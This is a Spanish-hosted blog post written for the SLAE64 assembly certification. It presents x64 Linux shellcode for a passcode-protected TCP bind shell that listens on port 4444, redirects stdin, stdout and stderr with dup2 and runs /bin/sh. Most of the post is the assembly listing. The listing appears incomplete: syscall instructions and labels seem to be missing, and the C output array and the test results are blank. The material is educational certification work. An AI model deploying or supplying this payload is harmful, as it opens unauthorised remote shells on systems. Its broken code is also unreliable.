sábado, 24 de mayo de 2014

[SLAEx64] tcp_bind_shell with passcode

Source: SecurityTube

This is x64 bits tcp bind shell with passcode, if you need more explications, please check my post about x32 bits bind shell, where you can found man about *nix socket programing

shell asm source

;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
;175 bytes

global _start
section .text
    push byte 0x29 ; 41 - socket syscall 
    pop rax
    push byte 0x02 ; AF_INET
    pop rdi 
    push byte 0x01 ; SOCK_STREAM
    pop rsi
    ;copy socket descriptor to rdi for future use
    xchg rdi, rax
    xor rax, rax
    mov dword [rsp-4], eax    ;INADDR_ANY
    mov word  [rsp-6], 0x5c11 ;PORT 4444
    mov byte  [rsp-8], 0x2    ;AF_INET
    sub rsp, 0x8
    push byte 0x31 ;49 bind
    pop rax 
    mov rsi, rsp
    add dl, 16 ;len
    push byte 0x32 ;listen
    pop rax
    ;push byte 0x02 ;max clients
    ;pop rsi
    push byte 0x2b ; accept
    pop rax
    sub rsp, 0x10  ; adjust
    xor rsi, rsi    
    mov rsi, rsp ; pointer
    mov byte [rsp-1], 0x10 ;len
    sub rsp, 0x01   ; adjust
    mov rdx, rsp ; pointer
    ;read buffer
    mov rdi, rax ; socket
    xor rax, rax
    mov byte [rsp-1], al ;0 read
    sub rsp, 1
    push rdx ; 0 stdin
    lea rsi, [rsp-0x10] ; 16 bytes from buffer
    add dl, 0x10        ; len
    ;test passcode
    mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
    push rdi                    ; save the socket
    lea rdi, [rsi]              ; load string from address
    scasq                       ; compare
    jz accepted_passwd          ; jump if equal
    ;exit if different :P
    xor rax, rax 
    add al, 60


    pop rdi; socket
    push byte 0x03
    pop rsi

    dec rsi
    push byte 0x21
    pop rax
    jnz dup2_loop ; jump if not 0

    push rsi; 0
    ;push /bin//sh in reverse
    mov rbx, 0x68732f2f6e69622f
    push rbx
    mov rdi, rsp
    push rsi
    mov rdx, rsp
    push rdi 
    mov rsi, rsp
    push byte 0x3b
    pop rax

C output

unsigned char code[] =\


Correct passwd

Incorrect passwd

This shellcode was accepted to shell-storm.org and can be found here, special thank to @JonathanSalwan for accept it :)

SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

No hay comentarios:

Publicar un comentario